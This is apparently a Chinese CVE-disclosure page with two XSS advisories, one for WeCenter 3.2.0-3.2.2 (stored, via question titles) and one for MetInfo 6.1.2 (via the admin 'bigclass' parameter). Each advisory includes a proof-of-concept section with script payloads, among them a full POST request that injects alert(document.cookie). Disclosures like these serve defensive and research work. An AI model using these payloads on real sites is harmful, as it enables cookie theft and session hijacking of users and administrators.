CVE中文申请站

CVE-2018-19083:WeCenter3.2.0-3.2.2储存型XSS

一、漏洞摘要

漏洞名称: WeCenter3.2.0-3.2.2储存型XSS
上报日期: 2018-11-02
漏洞发现者: Smi1e
产品首页: http://wenda.wecenter.com/
软件链接: http://wenda.wecenter.com/
版本: 3.2.0-3.2.2
CVE编号: CVE-2018-19083


二、漏洞概述

漏洞存在于WeCenter3.2.0/views/default/question/index.tpl.html中的第644,645,664,665行。
1.png
用户发布的问题标题经过htmlspecialchars_decode函数输出到了JS里,此处应该用htmlspecialchars() ,导致XSS漏洞。
2.png
当输入<script>alert(1)</script>后在浏览器渲染的时候,第一个</script>标签闭合了JS开头的<script>标签,从而从单引号中逃逸了出来,导致成功执行了JS代码。然后逃逸出来的单引号又闭合了下一个<script>前面的的单引号,从而导致弹窗了3次alert(1)。

三、利用代码

exp代码如下:

问题标题处输入:<script>alert(1)</script>
post数据包如下:
POST /WeCenter322/?/publish/ajax/publish_question/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 233
Cookie: lrs__Session=vvoutttrb79pa5fqgscqpdk0o2; lrs__user_login=6mdKXpYsXXBcYDxSW5FvDkK%2B%2FYr%2BIzrQEEpWa87z3kLrCBkGsZQpEnz%2FOiwHyE%2Fu5Xhn%2BqeLcDU3TT9%2Fppl1yXZclxcyrtHud9rR8EgfFyszWNY3cLkktjGsmh8Ae%2BiH
DNT: 1
Connection: close

post_hash=9e862174d7447bf2e73d591ee2090d42&attach_access_key=e91fee78235153fdff2f86281e8593e5&question_id=&ask_user_id=&category_id=1&question_content=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&question_detail=&_post_type=ajax

3.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/76/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19083
exploit-db:发布中

CVE-2018-18296:Metinfo-6.1.2版本存在XSS漏洞

一、漏洞摘要

漏洞名称: Metinfo-6.1.2版本存在XSS漏洞
上报日期: 2018-10-12
漏洞发现者: 踏月留香
产品首页: https://www.metinfo.cn/
软件链接: https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip
版本: 6.1.2
CVE编号: CVE-2018-18296


二、漏洞概述

漏洞存在于MetInfo6.1.2/admin/index.php页面,由于参数bigclass过滤不严,导致XSS漏洞
本地搭建网站,首先登录网站后台:http://172.16.141.134/MetInfo6.1.2/admin/,登录成功后,构造payload:
http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e即可执行跨站脚本
xss.png

三、利用代码

exp代码如下:

http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/52/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18296
exploit-db:发布中